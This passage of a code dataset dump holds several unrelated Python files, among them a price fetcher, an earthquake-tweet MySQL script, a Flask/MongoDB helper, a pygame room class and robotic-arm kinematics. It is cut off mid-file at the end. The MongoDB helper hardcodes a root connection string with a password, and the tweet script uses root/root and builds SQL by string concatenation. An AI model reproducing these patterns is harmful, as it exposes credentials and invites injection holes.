'DIGITAL_CURRENCY_DAILY'\r\n para[\"symbol\"] = code,\r\n ts = 'Time Series (Digital Currency Daily)'\r\n sym = '2. Digital Currency Code'\r\n names = cry_names\r\n else:\r\n ts, sym = 'Time Series (Daily)', '2. Symbol'\r\n para[\"outputsize\"] = \"full\"\r\n para[\"symbol\"] = code,\r\n page = requests.get(url, params=para)\r\n time.sleep(13) # 5 requests per minute allowed\r\n if ts in page.json():\r\n data2 = pd.DataFrame.from_dict(page.json()[ts],\r\n orient='index', dtype=float)\r\n data2['Symbol'] = page.json()['Meta Data'][sym]\r\n data2.index = pd.to_datetime(data2.index)\r\n data2.reset_index(level=0, inplace=True)\r\n data2['index'] = data2['index'].apply(lambda x: x.date())\r\n data = pd.concat([data, data2], axis=0, ignore_index=True,\r\n sort=True)\r\n\r\n # Print Summary and export to csv\r\n print(f'Tickers obtained = {data.Symbol.sort_values().unique()}')\r\n if market == 'CRY':\r\n data.drop(columns=cry_names_drop, inplace=True)\r\n data.rename(columns={i: j for i, j in zip(data.columns, names)},\r\n inplace=True)\r\n data['symbol'] = data['symbol'].astype('str')\r\n data['date'] = pd.to_datetime(data['date'])\r\n # data.to_csv(market+'_adjusted_data.csv', index=False)\r\n except Exception as error:\r\n print(error)\r\n finally:\r\n # if the api returns an error still return the fetched tickers\r\n return data\r\n return data\r\n\r\n\r\ndef main():\r\n return get_adjusted_data(market='SNP', num_stocks=3)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # pass\r\n main()\r\n","sub_path":"data_fetch.py","file_name":"data_fetch.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"371351893","text":"import pandas as pd\nfrom datetime import timedelta,datetime\nimport MySQLdb\n\n\ndf = pd.read_csv(\"jazminMeses.csv\", sep =\"|\")\ndf[\"Magnitud\"] = df[\"Magnitud\"].str[0:3].astype(\"float32\")\n\n\n#print(df.loc[ df[\"Magnitud\"] > 6.0])\n\ndf = df.loc[ df[\"Magnitud\"] > 5.0]\nprint(df)\n\ndates = []\nfor date_time in df[\"Fecha UTC\"]:\n\n date,time = tuple(date_time.split(\" \"))\n day, month, year = tuple(date.split(\"/\"))\n hour, minu, sec = tuple(time.split(\":\"))\n\n dt = datetime(int(year), int(month), int(day), int(hour), int(minu), int(sec))\n dates.append(dt)\n\ndf[\"Date UTF Python\"] = dates\n\n\nmonths = {}\nmonths[6] = \"junio\"\nmonths[7] = \"julio\"\nmonths[8] = \"agosto\"\n\n\n# connect\ndbdic = {}\nfor month in months:\n dbdic[month] = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"root\", db=months[month]+\"tweetschile\")\n\n\ndef tweetsByDateOfEarthQuakeInWindow(timewindow =30):\n tweetsByDateOfEarthQuakeInWindow = {}\n\n\n\n listDateUTF = df[\"Date UTF Python\"]\n for datetime_ini in listDateUTF:\n if(datetime_ini.month in months):\n DB_NAME = months[datetime_ini.month]+\"tweetschile\"\n tweetsByDateOfEarthQuakeInWindow[datetime_ini] = []\n\n datetime_fin = datetime_ini + timedelta(minutes=timewindow)\n query = 'select * from '+DB_NAME+'.'+datetime_ini.strftime('%Y%m%d')+'_tweets where creation_date>=\\''+datetime_ini.strftime('%Y/%m/%d %H:%M:%S')+'\\' and creation_date<=\\''+datetime_fin.strftime('%Y/%m/%d %H:%M:%S')+'\\';'\n\n cursor = dbdic[datetime_ini.month].cursor()\n cursor.execute(query)\n dbdic[datetime_ini.month].commit()\n\n numrows = int(cursor.rowcount)\n\n # get and display one row at a time.\n for x in range(0, numrows):\n row = cursor.fetchone()\n\n\n tweetsByDateOfEarthQuakeInWindow[datetime_ini].append(row[11].lower().split())\n\n return tweetsByDateOfEarthQuakeInWindow\n\n\ndef tweetsBeforeEarthQuakeInWindow(timewindow=30):\n tweetsBeforeEarthQuakeInWindow = {}\n\n listDateUTF = df[\"Date UTF Python\"]\n for datetime_fin1 in listDateUTF:\n datetime_fin = datetime_fin1 - timedelta(seconds=1)\n if (datetime_fin.month in months):\n DB_NAME = months[datetime_fin.month] + \"tweetschile\"\n tweetsBeforeEarthQuakeInWindow[datetime_fin1] = []\n\n datetime_ini = datetime_fin - timedelta(minutes=timewindow)\n query = 'select * from ' + DB_NAME + '.' + datetime_ini.strftime(\n '%Y%m%d') + '_tweets where creation_date>=\\'' + datetime_ini.strftime(\n '%Y/%m/%d %H:%M:%S') + '\\' and creation_date<=\\'' + datetime_fin.strftime('%Y/%m/%d %H:%M:%S') + '\\';'\n\n cursor = dbdic[datetime_ini.month].cursor()\n cursor.execute(query)\n dbdic[datetime_ini.month].commit()\n\n numrows = int(cursor.rowcount)\n\n # get and display one row at a time.\n for x in range(0, numrows):\n row = cursor.fetchone()\n\n tweetsBeforeEarthQuakeInWindow[datetime_fin1].append(row[11].lower().split())\n\n return tweetsBeforeEarthQuakeInWindow\n\n\n\n\n\nif __name__ == \"__main__\":\n\n\n\n tweetsBeforeEarthQuakeInWindow = tweetsBeforeEarthQuakeInWindow()\n l = list(tweetsBeforeEarthQuakeInWindow.items())\n print(len(l[0][1]))\n print(len(l[1][1]))\n print(len(l[2][1]))\n print(len(l[3][1]))\n\n","sub_path":"pack1/chargeData.py","file_name":"chargeData.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"443228737","text":"# The routes are the different URLs that the application implements. In Flask, handlers for the application routes are\n# written as Python functions, called view functions. View functions are mapped to one or more route URLs so that Flask\n# knows what logic to execute when a client requests a given URL.\nimport click\nfrom flask import current_app, g\nfrom flask_pymongo import PyMongo\nfrom flask.cli import with_appcontext\nfrom app import app\n\n\ndef get_db():\n if 'db' not in g:\n app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n app.config['SECRET_KEY'] = 'dev'\n app.config['MONGO_DBNAME'] = 'slither'\n app.config[\n 'MONGO_URI'] = \"mongodb+srv://root:SAdmin1@mongo-dev-db-0e9wb.mongodb.net/slither?retryWrites=true&w=majority\"\n\n mongo = PyMongo(app)\n g.db = mongo\n return g.db\n\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n db.close()\n\n\ndef init_db():\n db = get_db()\n\n with current_app.open_resource('schema.sql') as f:\n db.executescript(f.read().decode('utf8'))\n\n\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n init_db()\n click.echo('Initialized the database.')\n\n\ndef init_app(app):\n app.teardown_appcontext(close_db)\n app.cli.add_command(init_db_command)\n","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536629639","text":"import pygame\nimport xml.etree.ElementTree as ET\nimport os\nimport random\n\nimport Config as cfg\nfrom objects.Door import Door\n\nUP = (0, -1)\nDOWN = (0, 1)\nLEFT = (-1, 0)\nRIGHT = (1, 0)\n\nclass Room:\n \"\"\"This class contains all settings related to a room in dungeon.\n\n \"\"\"\n def __init__(self, game, doors, type_='default'):\n \"\"\"__init__ method for Room class\n\n Args:\n game (): Integrate.Game class object.\n doors (str): Which door available (NSWE). Possible values : combination of N,S,E and W\n type_ (str): type of room. Possible values (start or default)\n\n \"\"\"\n self.game = game\n self.doors = doors\n self.type = type_\n self.w = cfg.WIDTH // cfg.TILESIZE\n self.h = (cfg.HEIGHT - cfg.GUI_HEIGHT) // cfg.TILESIZE\n \n self.visited = False\n self.pos = [0, 0] # initializing position with [0,0]\n self.dist = -1 # initializing distance with -1\n self.shut_doors_sprites = [] # a list of sprites that represent the closed doors\n self.cleared = False # boolean for if the player has done all the tasks in a room\n self.is_doors_shut = False\n self.object_data = []\n\n self.TM_POOL = self.randomize_rooms_tmx()\n # choose a random tmx file for this room\n if self.type == 'start': self.tm_file = 'room_0.tmx'\n else: self.tm_file = 'room_{}.tmx'.format(self.TM_POOL.pop())\n \n self.build()\n\n\n def randomize_rooms_tmx(self):\n \"\"\"Room class method for choosing random tmx file for each room.\n \n \"\"\"\n TM_POOL = []\n for i in range(cfg.DUNGEON_SIZE[0] * cfg.DUNGEON_SIZE[1]):\n TM_POOL.append(random.choice(cfg.TILEMAP_FILES))\n\n return TM_POOL\n\n def is_doors_equal(self, doors_1, doors_2):\n \"\"\"Room class method for comparing doors.\n \n Args:\n doors_1 (str): doors, possible values are a combination of N,W,E and S.\n doors_2 (Str): doors, possible values are a combination of N,W,E and S.\n\n Returns:\n doors_equal (bool): True if equal doors, False otherwise.\n\n \"\"\"\n doors_equal = True\n if len(doors_1) != len(doors_2):\n doors_equal = False\n \n doors_temp_1 = doors_1\n doors_temp_2 = doors_2\n for doors in doors_1:\n if doors not in doors_temp_2:\n doors_equal = False\n else:\n doors_temp_2 = doors_temp_2.replace(doors, '', 1)\n\n for doors in doors_2:\n if doors not in doors_temp_1:\n doors_equal = False\n else:\n doors_temp_1 = doors_temp_1.replace(doors, '', 1)\n \n return doors_equal\n\n def build(self): \n \"\"\"Room class method for building room.\n \n \"\"\"\n for doors in self.game.imageLoader.room_image_dict:\n if self.is_doors_equal(self.doors, doors) == True:\n self.image = self.game.imageLoader.room_image_dict[doors] \n self.tile_or_wall_doors()\n\n def tileset_from_tmx(self, filename):\n \"\"\"Room class method for extracting tileset from tmx file.\n \n Args:\n filename (str): filename of the tmx file.\n\n \"\"\"\n # reading xml\n file = os.path.join(cfg.ROOM_FOLDER, filename)\n tree = ET.parse(file)\n root = tree.getroot()\n \n # get tile data from csv node\n data = root[1][0].text\n data = data.replace(' ', '')\n data = data.strip('\\n') \n data = data.split('\\n')\n \n tile_array = [line.strip(',').split(',') for line in data]\n \n for i in range(len(tile_array)):\n for j in range(len(tile_array[i])):\n tile_array[i][j] = int(tile_array[i][j]) - 1\n\n return tile_array \n\n def objects_from_tmx(self, filename):\n \"\"\"Room class method for extracting tileset from tmx file.\n \n Args:\n filename (str): filename of the tmx file.\n\n \"\"\"\n file = os.path.join(cfg.ROOM_FOLDER, filename)\n tree = ET.parse(file)\n root = tree.getroot()\n \n raw_objects = root.iter('object')\n objects = []\n\n for obj in raw_objects:\n a = {}\n for key, value in obj.attrib.items():\n try:\n a[key] = float(value)\n except ValueError:\n a[key] = value\n child = obj.iter()\n for node in child:\n na = node.attrib\n if na.get('name') and na.get('name') not in a.keys():\n if na.get('value') is not None:\n a[na['name']] = float(na.get('value'))\n objects.append(a)\n \n return objects\n\n\n def tile_or_wall_doors(self):\n \"\"\"Room class method for tiling for doors present and walling for not present.\n \n \"\"\"\n # door position is in middle of the walls\n door_x = self.w // 2\n door_y = self.h // 2\n\n # read tileset and object data from files\n self.tiles = self.tileset_from_tmx(self.tm_file)\n self.layout = self.objects_from_tmx(self.tm_file)\n \n # setting tiles for doors that are present in the room\n if 'N' in self.doors:\n for i in range(8,12):\n self.tiles[0][i] = 1\n \n if 'S' in self.doors:\n for i in range(door_x-2, door_x+2):\n self.tiles[self.h - 1][i] = 1\n \n if 'W' in self.doors:\n for i in range(door_y-1, door_y+2):\n self.tiles[i][0] = 1\n \n if 'E' in self.doors:\n for i in range(door_y-1, door_y+2):\n self.tiles[i][self.w - 1] = 1\n\n # setting Wall for doors that are not present in the room\n if 'N' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 360, 'y': 3.1, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 400, 'y': 3.1, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 440, 'y': 3.1, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 320, 'y': 3.1, 'width': 40, 'height': 40})\n \n if 'S' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 360, 'y': 558, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 400, 'y': 558, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 440, 'y': 558, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 320, 'y': 558, 'width': 40, 'height': 40})\n \n if 'W' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 3, 'y': 240, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 3, 'y': 280, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 3, 'y': 320, 'width': 40, 'height': 40})\n \n if 'E' not in self.doors:\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 758, 'y': 240, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 758, 'y': 280, 'width': 40, 'height': 40})\n self.layout.append({'id': 0, 'name': 'Wall', 'x': 758, 'y': 320, 'width': 40, 'height': 40})\n\n def open_doors(self):\n \"\"\"Room class method for opening up doors by deleting the door sprites.\n \n \"\"\"\n if self.is_doors_shut:\n for d in self.shut_doors_sprites:\n d.kill()\n self.is_doors_shut = False\n\n def append_door_sprite(self, door):\n \"\"\"Room class method for placing the door sprite.\n \n Args:\n door (char): the current door character, possible values are N, S, E and W.\n\n \"\"\"\n door_pos = (cfg.DOOR_POSITIONS[door][0], cfg.DOOR_POSITIONS[door][1] + cfg.GUI_HEIGHT)\n door_sprite = Door(self.game, door_pos, direction=door)\n self.shut_doors_sprites.append(door_sprite)\n \n def shut_doors(self):\n \"\"\"Room class method for closing doors placing door sprites.\n \n \"\"\"\n if self.is_doors_shut == False:\n for door in self.doors:\n if self.type == 'start':\n door_pos = (cfg.DOOR_POSITIONS[door][0], cfg.DOOR_POSITIONS[door][1] + cfg.GUI_HEIGHT)\n d = Door(self.game, door_pos, direction=door)\n self.shut_doors_sprites.append(d)\n else:\n if self.game.dircheck == UP or self.game.dircheck == RIGHT or self.game.dircheck == LEFT or self.game.dircheck == DOWN:\n if 'N' in self.doors:\n self.append_door_sprite('N')\n if 'E' in self.doors:\n self.append_door_sprite('E')\n if 'W' in self.doors:\n self.append_door_sprite('W')\n if 'S' in self.doors:\n self.append_door_sprite('S')\n \n \n self.is_doors_shut = True\n \n \n","sub_path":"Room.py","file_name":"Room.py","file_ext":"py","file_size_in_byte":9443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"419804216","text":"from sklearn.linear_model import LinearRegression\nimport scipy.ndimage as ndi\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nseed = np.array(plt.imread('stealie.jpeg'))\nWidth = seed.shape[0]\nHeight = seed.shape[1]\n\n# seed = ndi.gaussian_laplace(seed,sigma=1)\n\n# generate random numpy array of the size 10,3\nX_train = seed[:,:,0]\ny_train = seed[:,:,0]\nX_test = np.random.random((Width,Height))\n\n# define the regression\nclf = LinearRegression()\n\n# fit & predict (predict returns numpy array of the same dimensions)\nclf.fit(X_train, y_train)\ny_pred = clf.predict(seed[:,:,0] - np.random.random_integers(0,255,Width*Height).reshape((Width,Height)))\n\nf, ax = plt.subplots(1, 2)\nax[0].imshow(y_train)\nax[1].imshow(y_pred)\nplt.show()","sub_path":"Art/2D/G3N/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"556338504","text":"from bson import ObjectId\r\nfrom pymongo import MongoClient, ReturnDocument\r\nfrom pymongo.collection import Collection\r\n\r\nfrom config.env import MONGODB\r\n\r\n_mongo_pools = {}\r\n\r\n\r\ndef get_mongo_pool(alias):\r\n if alias not in _mongo_pools:\r\n params = MONGODB[alias]\r\n name = params.pop(\"name\")\r\n auth = params.pop(\"auth\", None)\r\n params[\"connect\"] = False\r\n _mongo_pools[alias] = MongoClient(**params)[name]\r\n if auth:\r\n _mongo_pools[alias].authenticate(**auth)\r\n return _mongo_pools[alias]\r\n\r\n\r\nclass ModelException(Exception):\r\n pass\r\n\r\n\r\nclass MongoModel(Collection):\r\n _fields = None\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n\r\n def create(self, doc_or_docs):\r\n \"\"\"插入文档\r\n 相比于MongoDB原生的insert,增加了none值字段过滤和模型字段验证。\r\n\r\n :Parameters:\r\n - `doc_or_docs`: ``dict`` or ``list``,单个文档或文档列表\r\n\r\n :Returns:\r\n - 同原生insert接口\r\n \"\"\"\r\n if isinstance(doc_or_docs, dict):\r\n self._filter_none_value(doc_or_docs)\r\n self._validate(doc_or_docs)\r\n ret = super().insert_one(doc_or_docs)\r\n return ret.inserted_id\r\n elif isinstance(doc_or_docs, list):\r\n for v in doc_or_docs:\r\n self._filter_none_value(v)\r\n self._validate(v)\r\n ret = super().insert_many(doc_or_docs)\r\n return ret.inserted_ids\r\n\r\n def modify(\r\n self,\r\n spec,\r\n document,\r\n multi=False,\r\n upsert=False,\r\n validate=True,\r\n sort=None,\r\n return_document=None,\r\n unset_empty=True,\r\n ):\r\n \"\"\"部分更新文档\r\n 只更新置顶字段的值,如果值为空字符串则表示删除该字段,未指定的字段值保持不变\r\n\r\n :Parameters:\r\n - `spec`: ``dict``,更新条件\r\n - `document`: ``dict``,要更新的字段和值,如果字段值为\"\",则删除该字段,\r\n 字段值为None或不在document里的字段保持不变\r\n - `multi`: ``bool``,更新所有匹配文档还是仅第一个\r\n - `upsert`: ``bool``,没有匹配文档时是否插入\r\n - `validate`: ``bool``,是否验证文档合法性\r\n - `sort`: ``list``,multi为False,更新按此顺序匹配的第一个\r\n - `return_document`: ``ReturnDocument``,multi为False时,是否返回更新前或更新后的文档\r\n\r\n :Returns:\r\n - 更新的文档个数\r\n \"\"\"\r\n self._filter_none_value(document)\r\n if unset_empty:\r\n set_fields = {k: v for k, v in document.items() if v != \"\"}\r\n unset_fields = {k: v for k, v in document.items() if v == \"\"}\r\n else:\r\n set_fields = {k: v for k, v in document.items()}\r\n unset_fields = {}\r\n if validate:\r\n self._validate(set_fields, False)\r\n\r\n doc = {}\r\n if set_fields:\r\n doc[\"$set\"] = set_fields\r\n if unset_fields:\r\n doc[\"$unset\"] = unset_fields\r\n if not doc:\r\n if (\r\n return_document == ReturnDocument.AFTER\r\n or return_document == ReturnDocument.BEFORE\r\n ):\r\n return self.find_one(spec)\r\n else:\r\n return 0\r\n if multi:\r\n ret = super().update_many(spec, doc, upsert=upsert)\r\n return ret.modified_count\r\n else:\r\n if return_document is None:\r\n ret = super().update_one(spec, doc, upsert=upsert)\r\n return ret.modified_count\r\n else:\r\n return super().find_one_and_update(\r\n spec, doc, sort=sort, return_document=return_document\r\n )\r\n\r\n def find_by_ids(self, ids, keep_order=True):\r\n if not ids:\r\n return []\r\n\r\n docs = list(self.find({\"_id\": {\"$in\": ids}}))\r\n\r\n if keep_order:\r\n d = {v[\"_id\"]: v for v in docs}\r\n docs = [d.get(v) for v in ids]\r\n\r\n return docs\r\n\r\n @staticmethod\r\n def _filter_none_value(doc):\r\n if not isinstance(doc, dict):\r\n raise ModelException(\"doc should be a dict\")\r\n\r\n for k, v in list(doc.items()):\r\n if v is None:\r\n del doc[k]\r\n\r\n return doc\r\n\r\n @classmethod\r\n def _validate(cls, doc, required=True):\r\n if cls._fields is None:\r\n return\r\n\r\n for k, v in doc.items():\r\n if \".\" in k:\r\n continue\r\n\r\n if k not in cls._fields:\r\n raise ModelException(\"unexpected field '{}'\".format(k))\r\n\r\n type_, _ = cls._fields[k]\r\n if type_ is not None and not isinstance(v, type_):\r\n raise ModelException(\"field '{}' should be a '{}'\".format(k, type_))\r\n\r\n if required:\r\n fields = [k for k, v in cls._fields.items() if v[1]]\r\n for v in fields:\r\n if v not in doc:\r\n raise ModelException(\"field '{}' is required\".format(v))\r\n\r\n @classmethod\r\n def contains(cls, key):\r\n if cls._fields:\r\n return key in cls._fields\r\n return False\r\n\r\n @classmethod\r\n def field_keys(cls):\r\n if cls._fields:\r\n return cls._fields.keys()\r\n return set()\r\n","sub_path":"src/common/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"107344561","text":"#!/usr/bin/env python3\n\nfrom math import *\nimport numpy as np\n\nclass RoboticArm:\n def __init__(self):\n self.__l1 = 69.0\n self.__l2 = 80.0\n self.__l3 = 120.0\n self.__l4 = 57.94\n self.__l5 = 70\n\n self.__convertionAngleFor1 = 0\n self.__convertionAngleFor2 = -pi/2\n self.__convertionAngleFor3 = pi\n self.__convertionAngleFor4 = pi/2\n self.__convertionAngleFor5 = 0\n\n self.__joint_1_l = -3.14\n self.__joint_1_u = 3.14\n self.__joint_2_l = -2.6\n self.__joint_2_u = 2.6\n self.__joint_3_l = -2.6\n self.__joint_3_u = 2.6\n self.__joint_4_l = -1.60\n self.__joint_4_u = 1.60\n self.__joint_5_l = -2.60\n self.__joint_5_u = 2.60\n\n def DirectProblem(self,q1,q2,q3,q4,q5):\n\n l1 = self.__l1\n l2 = self.__l2\n l3 = self.__l3\n l4 = self.__l4\n l5 = self.__l5\n q1 = q1 - self.__convertionAngleFor1\n q2 = q2 - self.__convertionAngleFor2\n q3 = q3 - self.__convertionAngleFor3\n q4 = -q4 - self.__convertionAngleFor4\n q5 = q5 - self.__convertionAngleFor5\n\n # a1 = np.array([[cos(q1),0,sin(q1),0],\n # [sin(q1),0,-cos(q1),0],\n # [0,1,0,l1],\n # [0,0,0,1]])\n # a2 = np.array([[cos(q2),-sin(q2),0,l2*cos(q2)],\n # [sin(q2),cos(q2),0,l2*sin(q2)],\n # [0,0,1,0],\n # [0,0,0,1]])\n # a3 = np.array([[cos(q3),sin(q3),0,-l3*cos(q3)],\n # [sin(q3),-cos(q3),0,-l3*sin(q3)],\n # [0,0,-1,0],\n # [0,0,0,1]])\n # a4 = np.array([[cos(q4),0,sin(q4),0],\n # [sin(q4),0,-cos(q4),0],\n # [0,1,0,0],\n # [0,0,0,1]])\n # a5 = np.array([[cos(q5),-sin(q5),0,0],\n # [sin(q5),cos(q5),0,0],\n # [0,0,1,l4+l5],\n # [0,0,0,1]])\n\n # a1a2 = np.dot(a1,a2)\n # a1a2a3 = np.dot(a1a2,a3)\n # a1a2a3a4 = np.dot(a1a2a3,a4)\n # tT = np.dot(a1a2a3a4,a5)\n\n tT = np.array([[cos(q5)*(cos(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2))) - sin(q1)*sin(q5), -cos(q5)*sin(q1) - sin(q5)*(cos(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2))), -cos(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2)) + sin(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)), -cos(q1)*cos(q2)*cos(q3)*l3 + cos(q1)*cos(q2)*l2 + cos(q1)*l3*sin(q2)*sin(q3) + (l4 + l5)*(-cos(q4)*(cos(q1)*cos(q2)*sin(q3) + cos(q1)*cos(q3)*sin(q2)) + sin(q4)*(cos(q1)*cos(q2)*cos(q3) - cos(q1)*sin(q2)*sin(q3)))],\n [cos(q1)*sin(q5) + cos(q5)*(cos(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2))), cos(q1)*cos(q5) - sin(q5)*(cos(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2))), -cos(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2)) + sin(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)), -cos(q2)*cos(q3)*l3*sin(q1) + cos(q2)*l2*sin(q1) + l3*sin(q1)*sin(q2)*sin(q3) + (l4 + l5)*(-cos(q4)*(cos(q2)*sin(q1)*sin(q3) + cos(q3)*sin(q1)*sin(q2)) + sin(q4)*(cos(q2)*cos(q3)*sin(q1) - sin(q1)*sin(q2)*sin(q3)))],\n [cos(q5)*(cos(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)) + sin(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3))), -sin(q5)*(cos(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)) + sin(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3))), -cos(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)), -cos(q2)*l3*sin(q3) - cos(q3)*l3*sin(q2) + l1 + l2*sin(q2) + (l4 + l5)*(-cos(q4)*(-cos(q2)*cos(q3) + sin(q2)*sin(q3)) + sin(q4)*(cos(q2)*sin(q3) + cos(q3)*sin(q2)))],\n [0, 0, 0, 1]])\n\n return (np.dot(tT,np.array([[0],[0],[0],[1]])))\n\n def __ConvertionToOurSK(self,q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5):\n q1 = round(q1 + self.__convertionAngleFor1,2)\n q2_1 = round(q2_1 + self.__convertionAngleFor2,2)\n q2_2 = round(q2_2 + self.__convertionAngleFor2,2)\n q3_1 = round(q3_1 + self.__convertionAngleFor3,2)\n q3_2 = round(q3_2 + self.__convertionAngleFor3,2)\n q4_1 = round(q4_1 + self.__convertionAngleFor4,2)\n q4_2 = round(q4_2 + self.__convertionAngleFor4,2)\n q5 = round(q5 + self.__convertionAngleFor5,2)\n return q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5\n\n def __VadatingOfJointAngle(self,q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5):\n countAvailJointState = 0\n if (q1 >= self.__joint_1_l or q1 <= self.__joint_1_u):\n countAvailJointState += 1\n if (self.__Validatingq2q3q4(q2_1,q3_1,q4_1)):\n q2 = q2_1\n q3 = q3_1\n q4 = q4_1\n countAvailJointState += 3\n if(countAvailJointState < 2):\n if(self.__Validatingq2q3q4(q2_2,q3_2,q4_2)):\n q2 = q2_2\n q3 = q3_2\n q4 = q4_2\n countAvailJointState += 3\n\n if (q5 >= self.__joint_5_l and q5 <= self.__joint_5_u):\n countAvailJointState +=1\n\n if (countAvailJointState == 5):\n availConfig = True\n return availConfig,q1,q2,q3,q4,q5\n else:\n availConfig = False\n return availConfig,0,0,0,0,0\n\n def __Validatingq2q3q4(self,q2,q3,q4):\n if (q2 >= self.__joint_2_l and q2 <= self.__joint_2_u):\n if (q3 >= self.__joint_3_l and q3 <= self.__joint_3_u):\n if (q4 >= self.__joint_4_l and q4 <= self.__joint_4_u):\n return True\n return False\n\n def InversProblem(self,x,y,z,pitch = 0,roll = 0):\n q5 = roll\n \n q1 = atan2(y,x)\n\n w = sqrt(x**2+y**2)\n\n z1 = (z - self.__l1) - (self.__l4 + self.__l5)*sin(pitch)\n w1 = w - (self.__l4 + self.__l5)*cos(pitch)\n\n c = (self.__l3**2-w1**2-z1**2-self.__l2**2)/(-2)\n a = z1**2 + w1**2\n b = -2*z1*c\n e = c**2 - self.__l2**2*w1**2\n\n D = b**2 - 4*a*e\n\n if (D < 0 ):\n return False,[0,0,0,0,0]\n\n z2_1 = (-b + sqrt(D))/(2*a)\n z2_2 = (-b - sqrt(D))/(2*a)\n\n w2_1 = (c-z2_1*z1)/w1\n w2_2 = (c-z2_2*z1)/w1\n\n q2_1 = atan2(z2_1,w2_1)\n q2_2 = atan2(z2_2,w2_2)\n\n joint3Angle_1 = atan2(z1 - z2_1,w1-w2_1)\n joint3Angle_2 = atan2(z1 - z2_2,w1-w2_2)\n\n q3_1 = pi - q2_1 + joint3Angle_1\n q3_2 = pi - q2_2 + joint3Angle_2\n\n q4_1 = -(joint3Angle_1 - pitch)-pi/2\n q4_2 = -(joint3Angle_2 - pitch)-pi/2\n\n q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5 = self.__ConvertionToOurSK(q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5)\n list_ = [q1,q2_1,q2_2,q3_1,q3_2,q4_1,q4_2,q5]\n for i, el in enumerate(list_):\n if el > 2*pi:\n list_[i] = el - 2*pi\n elif(el < -2*pi):\n list_[i] = el + 2*pi\n availConfig,q1,q2,q3,q4,q5 = self.__VadatingOfJointAngle(*list_)\n\n return availConfig,[q1,q2,q3,q4,q5]\n\n# arm = RoboticArm()\n# print(arm.DirectProblem(0, -1.57, 0, 1.57,0))\n# print(arm.InversProblem(200,0,197,1.57))","sub_path":"angle_ax12_model_pkg/nodes/RoboticArmClass.py","file_name":"RoboticArmClass.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"265770710","text":"import json\nimport uuid\nimport csv\nimport os\n\nfrom datetime import datetime\nfrom io import StringIO\nfrom aiohttp import web\nfrom aiohttp_jinja2 import template\n\nfrom app.service.auth_svc import check_authorization\n\ndef generate_time_stamp():\n time_str = str(datetime.now())\n return time_str[2:4] + time_str[5:7] + time_str[8:10] + time_str[11:13] + time_str[14:16] + time_str[17:19]\n\ndef sanity_checks(header):\n try:\n mapper = {\n 'name': header.index('name'),\n 'description': header.index('description'),\n 'executor': header.index('executor'),\n 